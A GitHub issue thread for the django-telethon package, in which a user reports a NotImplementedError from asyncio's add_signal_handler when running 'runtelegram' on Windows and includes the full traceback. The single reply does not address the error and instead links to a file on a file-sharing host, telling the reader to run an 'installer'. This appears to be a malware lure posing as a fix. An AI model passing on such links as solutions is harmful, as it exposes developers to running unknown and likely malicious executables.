### ISSUE TITLE
NotImplementedError

### ISSUE THREAD

**Issue by THECH13F** [ali-zahedi/django-telethon#11]
Getting this error after `python manage.py runtelegram`

```
Traceback (most recent call last):
  File "D:\testing\SIH\drug tracking\DTDS\manage.py", line 22, in <module>
    main()
  File "D:\testing\SIH\drug tracking\DTDS\manage.py", line 18, in main
    execute_from_command_line(sys.argv)
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\site-packages\django\core\management\__init__.py", line 442, in execute_from_command_line
    utility.execute()
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\site-packages\django\core\management\__init__.py", line 436, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\site-packages\django\core\management\base.py", line 413, in run_from_argv
    self.execute(*args, **cmd_options)
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\site-packages\django\core\management\base.py", line 459, in execute
    output = self.handle(*args, **options)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\site-packages\django_telethon\management\commands\runtelegram.py", line 57, in handle
    asyncio.run(_main())
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\asyncio\runners.py", line 194, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\asyncio\runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_events.py", line 687, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\site-packages\django_telethon\management\commands\runtelegram.py", line 34, in _main
    loop.add_signal_handler(s, stop.set_result, None)
  File "C:\Users\hardi\AppData\Local\Programs\Python\Python312\Lib\asyncio\events.py", line 582, in add_signal_handler
    raise NotImplementedError
NotImplementedError
```

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
